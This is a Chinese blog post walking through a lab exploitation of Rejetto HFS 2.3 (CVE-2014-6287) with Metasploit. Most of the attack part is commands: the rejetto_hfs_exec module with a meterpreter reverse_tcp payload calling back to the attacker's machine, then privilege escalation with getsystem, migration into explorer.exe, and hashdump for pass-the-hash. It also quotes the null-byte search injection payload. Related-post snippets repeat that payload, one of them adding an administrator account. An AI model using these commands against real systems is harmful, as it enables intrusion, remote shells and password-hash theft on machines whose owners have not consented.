渗透之——Metasploit攻击HFS 2.3上的漏洞

最新推荐文章于 2024-08-12 21:06:42 发布
最新推荐文章于 2024-08-12 21:06:42 发布
阅读量6.3k 收藏 2
点赞数 1
分类专栏: 精通渗透系列 文章标签: 渗透 Metasploit CVE-2014-6287 HFS 2.3
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l1028386804/article/details/86358284
版权

转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86358284

攻击机: kali 192.168.109.137

靶机: windows server 2012 192.168.109.141

工具:Metasploit

根据CVE-2014-6287的描述,Rejetto网络文件服务器(也被称为HSF或者HttpFileServer)的2.3x版本(2.3c以前的版本)中的parserLib.pas文件使用了一个findMacroMaker函数,该漏洞源于parserLib.pas文件没有正确处理空字节。远程攻击者可借助搜索操作中的%00序列利用该漏洞执行任意程序。

下面给出了这个有漏洞的函数:

function findMacroMarker(s:string; ofs:integer=1):integer;

begin result:=reMatch(s, '\{[.:]|[.:]\}|\|', 'm!', ofs) end;

这个函数不能正确的处理空字节,所以当我们对http://localhost:80/search=%00{.exec|cmd.}发起请求时,就会停止对宏的正则解析,从而导致远程代码的注入。

1.开启MSF

msfconsole

2.渗透漏洞

search hfs
use exploit/windows/http/rejetto_hfs_exec
show options
set RHOST 192.168.109.141
set RPORT 8080
show payloads
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.109.137
set LPORT 4444
show options
exploit

此时,我们已经以管理员的身份获得了Windows server 2012系统的权限。

3.将权限提升为系统级

getsystem

4.查看系统进程和Meterpreter正在驻留的进程号

ps
getpid

5.绑定Meterpreter到其他进程

这里,为了保险起见,我们将Meterpreter的进程绑定到explorer.exe的进程号,这里,explorer.exe的进程号为1864,执行如下命令:

migrate 1864

此时,我们再次输入getpid命令查看,Meterpreter正在驻留的进程号变成了1864

6.收集系统密码的哈希值

hashdump

完成了哈希值的收集之后,就可以执行pass-the-hash攻击,在没有明文密码的情况下绕过限制。

 

冰 河
关注
专栏目录
针对HFS 2.3漏洞进行渗透测试提权(HFS:HttpFileServer)
shatianyzg的博客
10-30 884
利用MetasploitHFS 2.3渗透攻击提权针对HFS 2.3漏洞进行渗透测试提权(HFS:HttpFileServer)
渗透测试神器——Metasploit Framerwork使用
PICACHU+++的博客
02-19 4119
一、介绍 Metasploit Framework是一个编写、测试和使用exploit代码的完善环境。这个环境为渗透测试,shellcode编写和漏洞研究提供了一个可靠的平台,这个框架主要是由面向对象的Ruby编程语言编写的,并带有由C语言,汇编程序和Python编写的可选组件。 二、基本使用 1.信息收集 db_nmap /nmap -T [0-5]:默认为T3,T4表示最大TCP扫描延迟为10ms -sS:TCP SYN扫描,半开扫描 -sA:TCP ACK扫描 -sT:TCP扫描
利用MetasploitHFS 2.3渗透攻击提权
渗透测试
05-07 1945
文章目录前言一、Metasploit中使用数据库二、VSFTPD2.3.4渗透攻击1.威胁建模2.攻击3.渗透持久化4.清楚渗透痕迹总结 前言 针对HFS 2.3漏洞进行渗透测试提权(HFS:HttpFileServer) 一、Metasploit中使用数据库 开启步骤 root@kali:~# service postgresql start root@kali:~# msfdb init msfdb ini 初始化数据库 使用msfconsole启动metasploit 输入db_statu
HFS2.3漏洞利用.rar
12-28
很多用HFS当做建议下载程序 但有高危的代码审核问题。 可以添加管理员账户,密吗。 并且开启3389端口
渗透测试实战-HFS远程RCE漏洞利用
最新发布
haosha。的博客
08-12 784
渗透测试实战-HFS远程RCE漏洞利用
HFS远程命令执行漏洞复现
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
05-28 5791
漏洞程序下载地址:Http File Server 这里说一下,再Windows server 2003中复现时,我直接使用Administrator用户登录,然后复现,未出现权限问题。再Windows 10中尝试复现时发现权限不足,需要以管理员权限执行漏洞程序。 运行程序截图如下 尝试访问该软件提供的web服务 web服务是这个样子的,这个web服务的搜索处存在漏洞 一、手工利用 payload如下 http://127.0.0.1/?search==%00{.exec|cmd /c 此处替换为dos
HFS文件服务器RCE 漏洞复现(CVE-2024-23692)
huangyongkang666的博客
06-11 2953
Rejetto HFS是一款简单易用的Web文件服务器,可通过网络或互联网共享文件。该软件创建了一个Web界面,让用户可以直接在运行HFS软件的机器上上传或下载文件,在最新的Rejetto HTTP文件服务器(HFS)2.x版本中,发现了一个严重的安全漏洞,标记为CVE-2024-23692HFS 版本 2.4.0 RC7 和 2.3mCVE-2024-23692漏洞特别影响 HFS 版本 2.4.0 RC7 和 2.3m。根本原因在于服务器处理用于呈现 HTTP 响应的默认模板的方式。
HFS修复漏洞
09-20
HFS修复漏洞
Rejetto HFS 服务器存在严重漏洞受到攻击
网络研究观
07-07 1655
黑客正在针对旧版本的 Rejetto HTTP 文件服务器 (HFS) 注入恶意软件和加密货币挖矿程序。
Kali Linux渗透测试小实践——Metasploit与后门木马
PICACHU+++的博客
01-08 2906
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。
渗透测试之Metasploit
06-16
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序...
hfs 2.3m Build #300
12-28
在个人电脑上搭建http服务器,让其它朋友直接访问并下载,操作简单方便。
hsf服务器HFS网络文件服务器V2.3Beta完美汉化版很好的一个文件传输软件,和FTP一样的稳定性,但用的确实HTTP协议,文件传输好,汉化版简单易用!...
02-17
HFS网络文件服务器V2.3Beta完美汉化版很好的一个文件传输软件,和FTP一样的稳定性,但用的确实HTTP协议,文件传输好,汉化版简单易用!... HFS网络文件服务器V2.3Beta完美汉化版很好的一个文件传输软件,和FTP一样的稳定性,但用的确实HTTP协议,文件传输好,汉化版简单易用!...
hfs2.3 Ftp Server
06-05
HFS,它是一种上传文件的软件。 专为个人用户所设计的 HTTP 档案系统 - Http File Server,如果您觉得架设 FTP Server 太麻烦,那么这个软件可以提供您更方便的档案传输系统,下载后无须安装,只要解压缩后执行 hfs.exe,于「Virtual File System(虚拟档案系统)」窗格下按鼠标右键,即可新增/移除虚拟档案资料夹,或者,直接将欲加入的档案拖曳至此窗口,便可架设完成。
hfs提权 2.3b之前
02-03
简易提权 有弹窗 HFS2.3B以前漏洞提权.exe
Metasploit渗透测试指南_渗透测试_metasploit_
10-04
Metasploit框架是一个综合的渗透测试平台,它提供了大量的模块,包括漏洞利用、扫描、后渗透工具等。这些模块使得安全专家能够快速地识别和利用目标系统中的漏洞。下面我们将详细讨论Metasploit的主要组成部分及其...
安全开发-HFS漏洞利用脚本编写
niqiu320的博客
05-12 1002
0x01 安全开发-HFS漏洞利用脚本编写 下载并在虚拟机2008里面(因为主机防火墙缘故)开启HFS~网络文件服务器 2.3Beta 一、攻击准备 复制HFS的IP在浏览器中,并且在IP后添加用户exp /?search==%00%7B.exec%7Ccmd.exe%20/c%20net%20user%20TechSupport%20admin.12345%20/add%20%26%20net%20localgroup%20administrators%20admin.12345%20/add.%7D
HFS Cmd执行漏洞入侵与防御
u010005482的专栏
09-19 5641
最近爆出了HFS(Http File Server)爆出了这个漏洞
CVE-2024-23692:Rejetto HFS 2.x 远程代码执行漏洞[附POC]
薛定谔嘚喵博客
06-14 1497
Rejetto HTTP文件服务器是一个轻量级的HTTP服务器软件,它允许用户在本地计算机上快速搭建一个文件共享服务。2024年6月,互联网上披露其 2.x系列 存在CVE-2024-23692 远程代码执行漏洞,该漏洞源于存在模板注入漏洞,允许远程未经身份验证的攻击者通过发送特制的HTTP请求在受影响的系统上执行任意命令。
Metasploit漏洞攻击与防御实战:MS08-067与MS10-018
"本文主要介绍了如何使用Metasploit框架进行漏洞攻击实战,涵盖了MS08-067和MS10-018两个著名的漏洞Metasploit是一款广泛使用的渗透测试工具,允许安全专家模拟攻击行为以检测系统脆弱性。" 在网络安全领域,...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

冰 河

可以吃鸡腿么?

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值